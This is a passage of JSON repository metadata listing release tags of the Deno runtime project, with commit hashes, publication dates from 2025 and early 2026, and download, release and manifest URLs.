/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd